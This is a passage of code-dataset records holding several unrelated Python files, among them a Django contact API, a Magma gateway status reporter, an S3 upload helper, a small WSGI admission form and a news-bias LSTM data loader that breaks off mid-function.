B14.wheels.track_width_f_m, # meters\n 'track_rear': B14.wheels.track_width_r_m, # meters'\n 'cg_height': B14.cg_z_m, # meters\n 'car_lbs': B14.weight_lb, # lbs\n 'driver_lbs': 150, # lbs\n 'percent_rear_weight': 0.53,\n 'v_nom': 25.0, # m / s\n 'lltd': 0.5,\n 'steer_func': AntiAckermanB14(),\n 'tire_func': tire_func}\n\n# for testing new features\nmake_plot(default_params, percent_rear_weight=np.linspace(0.5, 1.0, endpoint=True, num=11))\n\n# huge batch job, takes at least an hour\n#make_plot(default_params,\n# LLTD=np.linspace(0.00, 1.00, endpoint=True, num=101),\n# percent_rear_weight=np.linspace(0.01, 0.99, endpoint=True, num=99),\n# car_lbs=np.linspace(260, 400, endpoint=True, num=40),\n# toe_in_front=np.linspace(-2, 2, endpoint=True, num=41),\n# toe_in_rear=np.linspace(-2, 2, endpoint=True, num=41),\n# track_front=np.linspace(0.1, 2.0, endpoint=True, num=39),\n# track_rear=np.linspace(0.1, 2.0, endpoint=True, num=39),\n# wheelbase=np.linspace(0.1, 2.3, endpoint=True, num=45),\n# )\n#\n\n","sub_path":"LapSim-master_python/CnAy/RunSuite.py","file_name":"RunSuite.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487262068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWe open a new book\n\"\"\"\n\nimport xlwings as xw\nimport datetime as dt\n\npath_01 = r\"C:\\GitHub\\learning_python\\xUdemy_xlwings\\S2_FirstSteps\\Test2.xlsx\"\n\nwb = xw.Book(path_01)\nsheet0= wb.sheets[0]\nsheet0.range(\"A1\").name = \"celdaA1\"\nprint(sheet0.range(\"A1\").name)\n\nsheet0.range(\"celdaA1\").value = \"esta es la celda A1\"\n\n\n#wb.close()\n","sub_path":"xUdemy_xlwings/S2_FirstSteps/S2_13_RangeNames_01.py","file_name":"S2_13_RangeNames_01.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"194298579","text":"# a parser which allows excluding imitations\r\nimport xml.etree.ElementTree as ET\r\n\r\ndef age_transform(metadata):\r\n '''transform age from years to months'''\r\n ageday = 0\r\n for i in metadata: # get the location of 'Y', 'M', 'D'\r\n if i == 'Y':\r\n loc_Y = metadata.index(i)\r\n elif i == 'M':\r\n loc_M = metadata.index(i)\r\n elif i == 'D':\r\n loc_D = metadata.index(i)\r\n for i in metadata: # get the number before 'Y', 'M', and 'D'\r\n if i == 'Y':\r\n age_year = int(metadata[loc_Y - 1])\r\n elif i == 'M':\r\n age_month = int(metadata[loc_Y + 1: loc_M])\r\n elif i == 'D':\r\n age_day = int(metadata[loc_M + 1: loc_D])\r\n if age_day >= 15:\r\n ageday = 1\r\n else:\r\n ageday = 0\r\n age_transformed = age_year * 12 + age_month + ageday\r\n return age_transformed\r\n\r\ndef age(fname):\r\n '''get the child's age from the file'''\r\n tree = ET.ElementTree(file=fname)\r\n root = tree.getroot()\r\n participant = root[0][0].attrib\r\n child_age = participant['age']\r\n return age_transform(child_age)\r\n\r\ndef sent(child_child, sent_list): # ???need to keep words starting with 'g'. But unable to read with child.text. solved\r\n #print(sent_list)\r\n if child_child.tag[-1] == 'w':\r\n sent_list.append(child_child.text)\r\n #print(sent_list)\r\n return sent_list\r\n\r\n\r\ndef speaker(child):\r\n '''get the speaker of the individual sentence'''\r\n who_dict = child.attrib\r\n who = who_dict['who']\r\n return who\r\n\r\ndef uid(child):\r\n '''get the int of the uid of the individual sentence'''\r\n uid_dict = child.attrib\r\n uID = int(uid_dict['uID'][1:])\r\n return uID\r\n\r\ndef sents(fname):\r\n '''[speaker, uid, [sent]]'''\r\n all_sents = []\r\n tree = ET.ElementTree(file=fname)\r\n root = tree.getroot()\r\n for child in root:\r\n if 'who' in child.attrib:\r\n sents = []\r\n sent_list = []\r\n sents.extend((speaker(child), uid(child)))\r\n for child_child in child:\r\n if child_child.tag[-1] == 'g':\r\n for child3 in child_child:\r\n sent(child3, sent_list)\r\n #print(uid(child), child_child.tag, child_child.attrib, child_child.text)\r\n else:\r\n sent(child_child, sent_list)\r\n sents.append(sent_list)\r\n all_sents.append(sents)\r\n return all_sents\r\n\r\ndef test(fname):\r\n print(sents(fname))\r\n#test('e:/project/Manchester/anne/anne01a.xml')\r\n\r\n","sub_path":"new_parser.py","file_name":"new_parser.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"610184649","text":"\"\"\"This module contains contact view with methods for CRUD operations\"\"\"\n\nimport json\n\nfrom django.http import JsonResponse, HttpResponse\nfrom django.views.generic.base import View\nfrom django.shortcuts import render\n\nfrom contact.models import Contact\nfrom contact.utils.verify_email import send_verification_email\nfrom moninag.settings import DEFAULT_FROM_EMAIL, DEFAULT_HOST\nfrom registration.utils.send_email import generate_activation_key\nfrom utils.validators import validate_dict, validate_email, validate_subdict\n\nREQUIREMENTS = {\n 'first_name',\n 'second_name',\n 'email'\n}\n\n\nclass ContactView(View):\n \"\"\"Contact view handles GET, POST, PUT, DELETE requests.\"\"\"\n\n def get(self, request, contact_id=None):\n \"\"\"Handles GET request.\n If contact_id is None, return json response with all contacts,\n otherwise contact with given id.\n If contact with specified id was not found return error.\n :param contact_id: int - contact id\n :return: JsonResponse:\n {\n response: \n or\n error: \n }\n \"\"\"\n\n json_response = {}\n\n if not contact_id:\n contacts = Contact.get_by_user_id(request.user.id)\n json_response['response'] = [contact.to_dict()\n for contact in contacts]\n return JsonResponse(json_response, status=200)\n\n contact = Contact.get_by_id(contact_id)\n\n if not contact:\n json_response['error'] = 'Contact with specified id was not found.'\n return JsonResponse(json_response, status=404)\n\n if not contact.user.id == request.user.id:\n return HttpResponse(status=403)\n\n json_response['response'] = contact.to_dict()\n\n return JsonResponse(json_response, status=200)\n\n def post(self, request):\n \"\"\"Handles POST request.\n Get contact data from POST request and create one in database.\n In response return created contact or error if contact was not created.\n Require JSON with fields:\n {\n 'first_name': ,\n 'second_name': ,\n 'email': \n }\n :return: JsonResponse:\n {\n response: \n or\n error: \n }\n \"\"\"\n\n json_response = {}\n\n contact_params = json.loads(request.body.decode('utf-8'))\n\n if not validate_dict(contact_params, REQUIREMENTS):\n json_response['error'] = 'Incorrect JSON format.'\n return JsonResponse(json_response, status=400)\n\n email = contact_params.get('email').lower()\n\n if not validate_email(email):\n json_response['error'] = 'Invalid email format.'\n return JsonResponse(json_response, status=400)\n\n contact = Contact.get_by_email(email)\n\n if contact:\n json_response['error'] = 'User with such email already exists.'\n return JsonResponse(json_response, status=400)\n\n else:\n contact = Contact()\n\n contact.first_name = contact_params['first_name']\n contact.second_name = contact_params['second_name']\n contact.email = email\n contact.user = request.user\n activation_key = generate_activation_key(email)\n contact.activation_key = activation_key\n contact.save()\n\n send_verification_email(\n DEFAULT_HOST, DEFAULT_FROM_EMAIL, contact.email, activation_key)\n\n json_response['response'] = contact.to_dict()\n return JsonResponse(json_response, status=201)\n\n def verify(request, activation_key): # pylint: disable=no-self-argument\n \"\"\"Making contact active (active=False -> active=True)\"\"\"\n\n contact = Contact.objects.get(activation_key=activation_key)\n contact.is_active = True\n contact.save()\n\n return render(request, 'contact/verified.html')\n\n def put(self, request, contact_id): # pylint: disable=no-self-use\n \"\"\"Handles PUT request.\n Get contact data from PUT request and update contact with given id in database.\n In response return updated contact or error if contact was not updated.\n :param contact_id: contact id\n :return: JsonResponse:\n {\n response: \n or\n error: \n }\n \"\"\"\n\n json_response = {}\n\n contact_params = json.loads(request.body.decode('utf-8'))\n\n if not validate_subdict(contact_params, REQUIREMENTS):\n json_response['error'] = 'Incorrect JSON format.'\n return JsonResponse(json_response, status=400)\n\n if 'email' in contact_params:\n email = contact_params.get('email').lower()\n if not validate_email(email):\n json_response['error'] = 'Invalid email format.'\n return JsonResponse(json_response, status=400)\n\n contact = Contact.get_by_id(contact_id)\n\n if not contact:\n json_response['error'] = 'Contact was not found.'\n return JsonResponse(json_response, status=404)\n\n if not request.user.id == contact.user.id:\n return HttpResponse(status=403)\n\n contact.update(**contact_params)\n json_response['response'] = contact.to_dict()\n return JsonResponse(json_response, status=200)\n\n def delete(self, request, contact_id): # pylint: disable=no-self-use\n \"\"\"Handles DELETE request.\n Delete contact with given id from database.\n :param contact_id: int - contact id\n :return: HttpResponse: Status 200 for success, 403 otherwise.\n \"\"\"\n\n contact = Contact.get_by_id(contact_id)\n\n if contact:\n if contact.user.id == request.user.id:\n contact.delete()\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=403)\n\n return HttpResponse(status=404)\n","sub_path":"moninag/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"447624487","text":"\"\"\"\nCopyright (c) 2016-present, Facebook, Inc.\nAll rights reserved.\n\nThis source code is licensed under the BSD-style license found in the\nLICENSE file in the root directory of this source tree. An additional grant\nof patent rights can be found in the PATENTS file in the same directory.\n\"\"\"\n\nimport json\nimport logging\nimport psutil\nimport platform\nimport time\nimport netifaces\nfrom typing import (\n NamedTuple,\n List,\n Any,\n Dict,\n)\nfrom magma.common.misc_utils import (\n get_ip_from_if,\n is_interface_up,\n get_all_ips_from_if_cidr,\n get_if_mac_address,\n IpPreference,\n)\nfrom magma.common.service import MagmaService\nfrom magma.magmad.check.machine_check.cpu_info import (\n get_cpu_info,\n)\nfrom magma.magmad.check.network_check.routing_table import (\n get_routing_table,\n)\n\n\nGatewayStatus = NamedTuple(\n 'GatewayStatus',\n [('machine_info', Dict[str, Any]), ('meta', Dict[str, str]),\n ('platform_info', Dict[str, Any]), ('system_status', Dict[str, Any])])\n\nSystemStatus = NamedTuple(\n 'SystemStatus',\n [('time', int), ('uptime_secs', int), ('cpu_user', int),\n ('cpu_system', int), ('cpu_idle', int), ('mem_total', int),\n ('mem_available', int), ('mem_used', int), ('mem_free', int),\n ('swap_total', int), ('swap_used', int), ('swap_free', int),\n ('disk_partitions', List[Dict[str, Any]])])\n\nPlatformInfo = NamedTuple(\n 'PlatformInfo',\n [('vpn_ip', str), ('packages', List[Dict[str, Any]]),\n ('kernel_version', str), ('kernel_versions_installed', List[str]),\n ('config_info', Dict[str, Any])])\n\nMachineInfo = NamedTuple(\n 'MachineInfo',\n [('cpu_info', Dict[str, Any]), ('network_info', Dict[str, Any])])\n\nNetworkInfo = NamedTuple(\n 'NetworkInfo',\n [('network_interfaces', List[Dict[str, Any]]),\n ('routing_table', List[Dict[str, Any]])])\n\nDiskPartition = NamedTuple(\n 'DiskPartition',\n [('device', str), ('mount_point', str), ('total', int), ('used', int),\n ('free', int)])\n\nConfigInfo = NamedTuple(\n 'ConfigInfo',\n [('mconfig_created_at', int)])\n\nPackage = NamedTuple(\n 'Package',\n [('name', str), ('version', str)])\n\nCPUInfo = NamedTuple(\n 'CPUInfo',\n [('core_count', int), ('threads_per_core', int), ('architecture', str),\n ('model_name', str)])\n\nNetworkInterface = NamedTuple(\n 'NetworkInterface',\n [('network_interface_id', str), ('mac_address', str),\n ('ip_addresses', List[str]), ('status', str),\n ('ipv6_addresses', List[str])]\n)\n\nRoute = NamedTuple(\n 'Route',\n [('destination_ip', str), ('gateway_ip', str),\n ('genmask', str), ('network_interface_id', str)])\n\n\nclass GatewayStatusNative:\n def __init__(self, service: MagmaService):\n self._service = service\n self._kernel_version = platform.uname().release\n self._boot_time = psutil.boot_time()\n cpu_info = get_cpu_info()\n if cpu_info.error is not None:\n logging.error('Failed to get cpu info: %s', cpu_info.error)\n self._cpu_info = CPUInfo(\n core_count=cpu_info.core_count,\n threads_per_core=cpu_info.threads_per_core,\n architecture=cpu_info.architecture,\n model_name=cpu_info.model_name,\n )\n\n def make_status(\n self,\n service_statusmeta: Dict[str, Any],\n kernel_versions_installed: List[str]) -> str:\n system_status = self._system_status_tuple()._asdict()\n platform_info = \\\n self._get_platform_info_tuple(kernel_versions_installed)._asdict()\n machine_info = self._get_machine_info_tuple()._asdict()\n\n gw_status = GatewayStatus(\n machine_info=machine_info,\n platform_info=platform_info,\n system_status=system_status,\n meta={},\n )\n for statusmeta in service_statusmeta.values():\n gw_status.meta.update(statusmeta)\n\n return json.dumps(gw_status._asdict())\n\n def _system_status_tuple(self) -> SystemStatus:\n cpu = psutil.cpu_times()\n mem = psutil.virtual_memory()\n swap = psutil.swap_memory()\n\n def partition_gen():\n for partition in psutil.disk_partitions():\n usage = psutil.disk_usage(partition.mountpoint)\n yield DiskPartition(\n device=partition.device,\n mount_point=partition.mountpoint,\n total=usage.total,\n used=usage.used,\n free=usage.free,\n )\n\n system_status = SystemStatus(\n time=int(time.time()),\n uptime_secs=int(time.time() - self._boot_time),\n cpu_user=int(cpu.user * 1000), # convert second to millisecond\n cpu_system=int(cpu.system * 1000),\n cpu_idle=int(cpu.idle * 1000),\n mem_total=mem.total,\n mem_available=mem.available,\n mem_used=mem.used,\n mem_free=mem.free,\n swap_total=swap.total,\n swap_used=swap.used,\n swap_free=swap.free,\n disk_partitions=[partition._asdict() for partition in\n partition_gen()],\n )\n return system_status\n\n def _get_platform_info_tuple(\n self, kernel_versions: List[str]) -> PlatformInfo:\n try:\n gw_ip = get_ip_from_if('tun0') # look for tun0 interface\n except ValueError:\n gw_ip = 'N/A'\n\n mconfig_metadata = self._service.mconfig_metadata\n\n platform_info = PlatformInfo(\n vpn_ip=gw_ip,\n packages=[\n Package(\n name='magma',\n version=self._service.version,\n )._asdict(),\n ],\n kernel_version=self._kernel_version,\n kernel_versions_installed=kernel_versions,\n config_info=ConfigInfo(\n mconfig_created_at=mconfig_metadata.created_at,\n )._asdict(),\n )\n return platform_info\n\n def _get_machine_info_tuple(self) -> MachineInfo:\n machine_info = MachineInfo(\n cpu_info=self._cpu_info._asdict(),\n network_info=self._get_network_info_tuple()._asdict(),\n )\n return machine_info\n\n def _get_network_info_tuple(self) -> NetworkInfo:\n def network_interface_gen():\n for interface in netifaces.interfaces():\n try:\n mac_address = get_if_mac_address(interface)\n except ValueError:\n mac_address = None\n\n try:\n ip_addresses = get_all_ips_from_if_cidr(\n interface, IpPreference.IPV4_ONLY)\n except ValueError:\n ip_addresses = []\n\n try:\n ipv6_addresses = get_all_ips_from_if_cidr(\n interface, IpPreference.IPV6_ONLY)\n except ValueError:\n ipv6_addresses = []\n\n yield NetworkInterface(\n network_interface_id=interface,\n status=\"UP\" if is_interface_up(interface) else \"DOWN\",\n mac_address=mac_address,\n ip_addresses=ip_addresses,\n ipv6_addresses=ipv6_addresses,\n )\n\n def make_route_tuple(route) -> Route:\n return Route(\n destination_ip=route.destination,\n gateway_ip=route.gateway,\n genmask=route.genmask,\n network_interface_id=route.interface,\n )\n\n routing_cmd_result = get_routing_table()\n if routing_cmd_result.error is not None:\n logging.error(\"Failed to get routing table: %s\",\n routing_cmd_result.error)\n\n network_info = NetworkInfo(\n network_interfaces=[\n network_interface._asdict() for network_interface in\n network_interface_gen()],\n routing_table=[\n make_route_tuple(route)._asdict() for\n route in routing_cmd_result.routing_table],\n )\n return network_info\n","sub_path":"orc8r/gateway/python/magma/magmad/gateway_status.py","file_name":"gateway_status.py","file_ext":"py","file_size_in_byte":8147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"547953381","text":"import os\nimport boto\nimport io\nfrom boto.s3.key import Key\n\nAWS_ACCESS_KEY = os.environ['NB_S3_ACCESS_KEY'] #config.get('S3', 'AccessKey')\nAWS_SECRET_ACCESS_KEY = os.environ['NB_S3_SECRET_KEY'] #config.get('S3', 'SecretKey')\nS3_BUCKET = os.environ['NB_S3_BUCKET'] #config.get('S3', 'Bucket')\n\n\"\"\"\nTaken from addrbook example\n\"\"\"\n\ndef s3_upload(uploaded_file, id):\n s3conn = boto.connect_s3(AWS_ACCESS_KEY,AWS_SECRET_ACCESS_KEY)\n bucket = s3conn.get_bucket(S3_BUCKET)\n\n k = Key(bucket)\n k.key = 'id-' + str(id)\n k.content_type = uploaded_file.content_type\n\n if hasattr(uploaded_file,'temporary_file_path'):\n k.set_contents_from_filename(uploaded_file.temporary_file_path())\n else:\n k.set_contents_from_string(uploaded_file.read())\n\n k.set_canned_acl('public-read')\n\n return k.generate_url(expires_in=0, query_auth=False)\n\ndef s3_delete(id):\n s3conn = boto.connect_s3(AWS_ACCESS_KEY,AWS_SECRET_ACCESS_KEY)\n bucket = s3conn.get_bucket(S3_BUCKET)\n\n k = Key(bucket)\n k.key = 'id-' + str(id)\n k.delete()","sub_path":"nanoblog/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"552055108","text":"#2021.03.18\r\n\r\n# Izveidot WSGI aplikāciju.\r\n# “/university” atbild ar formu, kas prasa lietotājam ievadīt savu vārdu un vērtējumu matemātikas,\r\n# latviešu valodas un svešvalodas vidusskolas eksāmenos (0–100).\r\n# Kad forma tiek iesniegta, tiek atvērts “/university_response”. Tiek parādīts, vai cilvēks var stāties universitātē.\r\n# Cilvēks var stāties universitāte, ja visos eksāmenos ir ne mazāk kā 40 balles.\r\n# Opcionāli:\r\n# Kad forma tiek iesniegta, lietotājs paliek “/university” lapā, bet tiek parādīts, vai cilvēks var stāties universitātē.\r\n\r\nfrom wsgiref.simple_server import make_server\r\nfrom urllib.parse import parse_qs\r\n\r\n\r\ndef form(environ):\r\n\r\n response_content = \"\"\"\r\n
    \r\n Full name:
    \r\n Math:
    \r\n LV:
    \r\n RU:
    \r\n \r\n
    \r\n \"\"\"\r\n\r\n return [response_content.encode()]\r\n\r\n\r\ndef name(environ):\r\n try:\r\n length = int(environ[\"CONTENT_LENGTH\"])\r\n except ValueError:\r\n length = 0\r\n\r\n wsgi_input = environ[\"wsgi.input\"].read(length).decode()\r\n form_data = parse_qs(wsgi_input)\r\n\r\n try:\r\n grade_math = int(form_data[\"grade_math\"][0])\r\n grade_lv = int(form_data[\"grade_lv\"][0])\r\n grade_ru = int(form_data[\"grade_ru\"][0])\r\n except: # PEP 8: E722 do not use bare 'except'\r\n return [\"Wrong or no values given!\".encode()]\r\n\r\n can_apply = \"can\"\r\n if grade_math < 40 or grade_lv < 40 or grade_ru < 40:\r\n can_apply = \"can not\"\r\n\r\n response_content = f\"\"\"\r\n Name: {form_data[\"name\"][0]}
    \r\n Math: {form_data[\"grade_math\"][0]}
    \r\n LV: {form_data[\"grade_lv\"][0]}
    \r\n RU: {form_data[\"grade_ru\"][0]}
    \r\n
    \r\n {form_data[\"name\"][0]} {can_apply} apply to the university\r\n \"\"\"\r\n\r\n return [response_content.encode()]\r\n\r\n\r\ndef application(environ, start_response):\r\n\r\n status = \"200 OK\"\r\n headers = [(\"Content-type\", \"text/html\")]\r\n\r\n path = environ[\"PATH_INFO\"]\r\n method = environ[\"REQUEST_METHOD\"]\r\n\r\n if path == \"/university\":\r\n if method == \"GET\":\r\n response_content = form(environ)\r\n if method == \"POST\":\r\n response_content = name(environ)\r\n else:\r\n response_content = [f\"

    Welcome to homepage!

    You browsed for: {path}\".encode()]\r\n\r\n start_response(status, headers)\r\n\r\n return response_content\r\n\r\n\r\nHOST = \"localhost\"\r\nPORT = 8000\r\n\r\nwith make_server(HOST, PORT, application) as server:\r\n print(f\"Serving at http://{HOST}:{PORT}\")\r\n server.serve_forever()\r\n","sub_path":"uzd_13.py","file_name":"uzd_13.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"115020987","text":"#!/usr/bin/env python\n\n# Parameters:\n# --training_data=\n# Directory that contains the articles XML file with the articles for which a prediction should be made.\n# --outputFile=\n# File to which the term frequency vectors will be written. Will be overwritten if it exists.\n\n# Output is one article per line:\n#
    : : ...\n\nfrom __future__ import print_function\n\nimport getopt\nimport json\nimport codecs\nimport os\nimport re\nimport sys\nimport time\nimport xml.sax\nfrom array import array\nfrom collections import Counter, OrderedDict\nfrom tqdm import tqdm\n\nimport lxml.etree\nimport lxml.sax\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom gensim.models.keyedvectors import KeyedVectors\nfrom keras.datasets import imdb\nfrom keras.layers import LSTM, Dense, Embedding\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nfrom keras.preprocessing.text import (Tokenizer, hashing_trick, one_hot,\n text_to_word_sequence)\n\n#from gensim import KeyedVectors\n\ndef print_usage(filename, message):\n print(message)\n print(\"Usage: python %s --training_data --training_labels --validation_data --validation_labels --test_data --test_labels \" % filename)\n\n########## OPTIONS HANDLING ##########\ndef parse_options():\n \"\"\"Parses the command line options.\"\"\"\n try:\n long_options = [\"training_data=\", \"training_labels=\", \"validation_data=\", \"validation_labels=\", \"test_data=\", \"test_labels=\"]\n opts, _ = getopt.getopt(sys.argv[1:], \"\", long_options)\n except getopt.GetoptError as err:\n print(str(err))\n sys.exit(2)\n\n training_data = \"undefined\"\n training_labels = \"undefined\"\n validation_data = \"undefined\"\n validation_labels = \"undefined\"\n test_data = \"undefined\"\n test_labels = \"undefined\"\n\n for opt, arg in opts:\n if opt in (\"-trd\", \"--training_data\"):\n training_data = arg\n elif opt in (\"-trl\", \"--training_labels\"):\n training_labels = arg\n elif opt in (\"-vd\", \"--validation_data\"):\n validation_data = arg\n elif opt in (\"-vl\", \"--validation_labels\"):\n validation_labels = arg\n elif opt in (\"-ted\", \"--test_data\"):\n test_data = arg\n elif opt in (\"-tel\", \"--test_labels\"):\n test_labels = arg\n else:\n assert False, \"Unknown option.\"\n\n if training_data == \"undefined\":\n message = \"training_data, the directory that contains the training articles XML file, is undefined.\"\n print_usage(sys.argv[0], message)\n sys.exit()\n elif not os.path.exists(training_data):\n sys.exit(\"The input dataset folder does not exist (%s).\" % training_data)\n\n if training_labels == \"undefined\":\n message = \"Label directory, the directory that contains the articles label datafile, is undefined. Use option -l or --training_labels.\"\n print_usage(sys.argv[0], message)\n sys.exit()\n elif not os.path.exists(training_labels):\n sys.exit(\"The label folder does not exist (%s).\" % training_labels)\n \n if validation_data == \"undefined\":\n message = \"validation_data is undefined\"\n print_usage(sys.argv[0], message)\n sys.exit()\n elif not os.path.exists(validation_data):\n sys.exit(\"the validation dataset file does not exist (%s).\" % validation_data)\n\n if validation_labels == \"undefined\":\n message = \"validation_labels is undefined\"\n print_usage(sys.argv[0], message)\n sys.exit()\n elif not os.path.exists(validation_labels):\n sys.exit(\"the validation_labels file does not exist (%s).\" % validation_labels)\n\n if test_data == \"undefined\":\n message = \"Test data directory is undefined. Use --test_data option.\"\n print(sys.argv[0], message)\n sys.exit()\n elif not os.path.exists(test_data):\n sys.exit(\"The test data folder does not exist (%s).\" % test_data)\n\n if test_labels == \"undefined\":\n message = \"Test label directory is undefined. Use --test_labels option.\"\n print(sys.argv[0], message)\n sys.exit()\n elif not os.path.exists(test_labels):\n sys.exit(\"The test label folder does not exist (%s).\" % test_labels)\n\n return (training_data, training_labels, validation_data, validation_labels, test_data, test_labels)\n\ndef clean_and_count(article, data):\n for token in article.text.split():\n if token in data.keys():\n data[token] += 1\n else:\n data[token] = 1\n\nclass customException(Exception):\n pass\n\ndef parse(datafile, labelfile, mode, max_articles, word_index={}, data=[]):\n\n count = 0\n left_count = 0\n right_count = 0\n neutral_count = 0\n max_articles = int(max_articles)\n\n tree = lxml.etree.parse(datafile)\n articles = tree.getroot().getchildren()\n\n # If both are provided\n # ie. The case of any data parsing, or word indexing\n if datafile != \"\" and labelfile != \"\":\n label_tree = lxml.etree.parse(labelfile)\n labels = label_tree.getroot().getchildren()\n\n # If only the datafile is provided\n # ie. The case of training_labels.xml\n elif labelfile == \"\":\n labels = articles \n\n for article, label in zip(articles, labels):\n if mode == 'y':\n print('max_articles=', max_articles)\n print(\"\\tMode = \" + mode)\n print(\"Total count:\", count)\n print(\"\\tleft:\\t\\t\", left_count)\n print(\"\\tright:\\t\\t\", right_count)\n print(\"\\tneutral:\\t\", neutral_count)\n\n # Once we've maintained our distribution, stop parsing\n if (count == max_articles and \n left_count == max_articles/4 and \n right_count == max_articles/4 and \n neutral_count == max_articles/2):\n\n print(\"\\tMode = \" + mode)\n print(\"Total count:\", count)\n print(\"\\tleft:\\t\\t\", left_count)\n print(\"\\tright:\\t\\t\", right_count)\n print(\"\\tneutral:\\t\", neutral_count)\n\n return\n else:\n b = label.get('bias')\n\n if left_count == max_articles/4 and b == 'left':\n continue\n elif right_count == max_articles/4 and b == 'right':\n continue\n elif neutral_count == max_articles/2 and b not in ['left', 'right']:\n continue\n else:\n if b == 'left':\n left_count += 1\n elif b == 'right':\n right_count += 1\n else:\n neutral_count += 1\n\n # Do stuff\n if mode == 'widx':\n clean_and_count(article, data)\n elif mode == \"x\":\n\n row = []\n \n # Split into sequence of words\n textcleaned = article.text.split()\n\n # Look up each word's index in freq index and append\n for word in textcleaned:\n idx = word_index[word]\n row.append(idx)\n \n # Append to sequence array\n data.append(row)\n\n elif mode == \"y\":\n\n bias = article.get('bias')\n\n if (bias == 'left'):\n left_count += 1\n elif (bias == 'right'):\n right_count += 1\n else:\n neutral_count += 1\n\n hp = article.get('hyperpartisan')\n\n if hp in ['true', 'True', 'TRUE']:\n data.append(1)\n elif hp in ['false', 'False', 'FALSE']:\n data.append(0)\n else:\n err = \"Mislabeled or unlabeled data found: \" + hp\n raise Exception(err)\n\n count += 1\n\n########## SAX FOR STREAM PARSING ##########\nclass HyperpartisanNewsParser(xml.sax.ContentHandler):\n def __init__(self, mode, word_index={}, data=[]):\n xml.sax.ContentHandler.__init__(self)\n self.mode = mode\n self.lxmlhandler = \"undefined\"\n self.data = data\n self.word_index = word_index\n self.counter = 0\n self.left_count = 0\n self.right_count = 0\n self.neutral_count = 0\n\n def startElement(self, name, attrs):\n if name != \"articles\":\n if name == \"article\":\n self.lxmlhandler = lxml.sax.ElementTreeContentHandler()\n\n self.lxmlhandler.startElement(name, attrs)\n\n def characters(self, data):\n if self.lxmlhandler != \"undefined\":\n self.lxmlhandler.characters(data)\n\n def endElement(self, name):\n if self.lxmlhandler != \"undefined\":\n self.lxmlhandler.endElement(name)\n if name == \"article\":\n if self.mode == \"widx\":\n clean_and_count(self.lxmlhandler.etree.getroot(), self.data)\n elif self.mode == \"x\":\n\n article = self.lxmlhandler.etree.getroot()\n\n row = []\n \n # Split into sequence of words\n textcleaned = article.text.split()\n\n # Look up each word's index in freq index and append\n for word in textcleaned:\n idx = self.word_index[word]\n row.append(idx)\n \n # Append to sequence array\n self.data.append(row)\n\n elif self.mode == \"y\":\n article = self.lxmlhandler.etree.getroot()\n\n bias = article.get('bias')\n\n if (bias == 'left'):\n self.left_count += 1\n elif (bias == 'right'):\n self.right_count += 1\n else:\n self.neutral_count += 1\n\n hp = article.get('hyperpartisan')\n\n if hp in ['true', 'True', 'TRUE']:\n self.data.append(1)\n elif hp in ['false', 'False', 'FALSE']:\n self.data.append(0)\n else:\n err = \"Mislabeled or unlabeled data found: \" + hp\n raise Exception(err)\n \n self.counter += 1\n self.lxmlhandler = \"undefined\"\n\n def endDocument(self):\n if self.mode == 'y':\n print(\"Total count:\", self.counter)\n print(\"\\tleft:\\t\\t\", self.left_count)\n print(\"\\tright:\\t\\t\", self.right_count)\n print(\"\\tneutral:\\t\", self.neutral_count)\n else:\n print(\"Total articles parsed:\", self.counter)\n\n\ndef create_word_index(datafile, labelfile, mode, max_articles=sys.maxsize):\n\n # Create a new file with a blank dictionary\n # training.json\n # test.json\n idx_file = \"data/word_indexes/\" + mode + \".json\"\n with open(idx_file, 'w') as f:\n data = {}\n json.dump(data,f)\n f.close()\n \n with open(datafile) as inputRunFile:\n try:\n xml.sax.parse(inputRunFile, HyperpartisanNewsParser(mode=\"widx\", data=data))\n except customException as e:\n print(e, end='')\n\n f = open(idx_file, 'w+')\n\n # Create a sorted dictionary\n o = OrderedDict(Counter(data).most_common(len(data)))\n\n # Replaces dict value with its index\n # {'blue': 56, 'brown': 28, 'red': 24} => {'blue': 0, 'brown': 1, 'red': 2}\n # This decreases runtime DRAMATICALLY.\n for w in enumerate(o):\n o[w[1]] = w[0]\n\n # Write dictionary to file\n json.dump(o, f)\n f.close()\n\n# Reads in data files\ndef get_data(filename, filetype, mode, data, labelfile=\"\", word_index={}):\n\n with open(filename) as iFile:\n xml.sax.parse( iFile, \n HyperpartisanNewsParser(\n mode=mode,\n word_index=word_index,\n data=data))\n\n# Loads data from xml files and transforms them for use with keras\ndef load_data(tr, tr_labels, val, val_labels, te, te_labels, num_words=None, skip_top=0, maxlen=None,\n seed=113, start_char=1, oov_char=2, index_from=3):\n\n start = time.time()\n with open('data/word_indexes/training.json', 'r') as f:\n training_widx = {}\n training_widx = json.load(f)\n\n finish = time.time()\n print('len(training_widx)= ', len(training_widx), \"\\n\")\n print(\"Loading training_widx took:\", finish-start)\n\n start = time.time()\n with open('data/word_indexes/validation.json', 'r') as f:\n validation_widx = {}\n validation_widx = json.load(f)\n\n finish = time.time()\n print(\"Loading validation_widx took:\", finish-start)\n\n start = time.time()\n with open('data/word_indexes/test.json', 'r') as f:\n test_widx = {}\n test_widx = json.load(f)\n\n finish = time.time()\n print(\"Loading test_widx took:\", finish-start, \"\\n\")\n\n # Start with python lists, then convert to numpy when finished for better runtime\n x_train = []\n y_train = []\n x_val = []\n y_val = []\n x_test = []\n y_test = []\n\n # Populate x_train\n #print(\"Populating x_train...\")\n start = time.time()\n get_data(filename=tr, labelfile=tr_labels, filetype='xml', mode=\"x\", data=x_train, word_index=training_widx)\n finish = time.time()\n 